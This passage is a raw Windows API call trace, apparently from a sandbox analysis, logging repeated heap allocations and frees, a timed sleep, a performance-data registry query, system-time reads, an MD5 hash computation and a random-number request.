lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.390] GetProcessHeap () returned 0xe30000 [0100.390] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.390] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.391] GetProcessHeap () returned 0xe30000 [0100.391] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.391] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.392] GetProcessHeap () returned 0xe30000 [0100.392] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.392] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.393] GetProcessHeap () returned 0xe30000 [0100.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.394] GetProcessHeap () returned 0xe30000 [0100.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.396] GetProcessHeap () returned 0xe30000 [0100.396] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681b2e0 | out: hHeap=0xe30000) returned 1 [0100.396] GetProcessHeap () returned 0xe30000 [0100.396] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0100.396] GetProcessHeap () returned 0xe30000 [0100.396] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf1dfa0 | out: hHeap=0xe30000) returned 1 [0100.396] GetProcessHeap () returned 0xe30000 [0100.396] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681d290 | out: hHeap=0xe30000) returned 1 [0100.396] Sleep (dwMilliseconds=0xea60) [0110.720] GetTickCount () returned 0x1199e6b [0110.720] GetProcessHeap () returned 0xe30000 [0110.720] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0110.720] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0110.725] GetProcessHeap () returned 0xe30000 [0110.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0110.725] GetTickCount () returned 0x1199e6b [0110.725] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0110.725] GetCurrentProcess () returned 0xffffffff [0110.725] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0110.725] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed4cc8) returned 1 [0110.726] CryptCreateHash (in: hProv=0xed4cc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0110.726] CryptHashData (hHash=0xec2030, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0110.726] CryptGetHashParam (in: hHash=0xec2030, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0110.726] CryptGetHashParam (in: hHash=0xec2030, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0110.726] CryptDestroyHash (hHash=0xec2030) returned 1 [0110.726] CryptReleaseContext (hProv=0xed4cc8, dwFlags=0x0) returned 1 [0110.726] GetProcessHeap () returned 0xe30000 [0110.726] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0110.726] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="d7") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="69") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="1f") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="21") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="cd") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="fa") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="c2") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="4f") returned 2 [0110.726] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="f0") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="98") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="66") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="66") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="d2") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="54") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="36") returned 2 [0110.727] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="06") returned 2 [0110.727] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed54c0) returned 1 [0110.727] CryptGenRandom (in: hProv=0xed54c0, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0110.727] CryptReleaseContext (hProv=0xed54c0, dwFlags=0x0) returned 1 [0110.727] GetProcessHeap () returned 0xe30000 [0110.727] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2bbc8 [0110.727] GetProcessHeap () returned 0xe30000 [0110.727] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825968 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xefd2e8 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6817c80 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825ba8 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x68410a0 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6874278 [0110.728] GetProcessHeap () returned 0xe30000 [0110.728] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f720 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xe9be68 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xef3600 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9be68 | out: hHeap=0xe30000) returned 1 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9ff70 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.729] GetProcessHeap () returned 0xe30000 [0110.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x68115c0 [0110.729] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9ff70 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed39f8 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68115c0 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.730] GetProcessHeap () returned 0xe30000 [0110.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 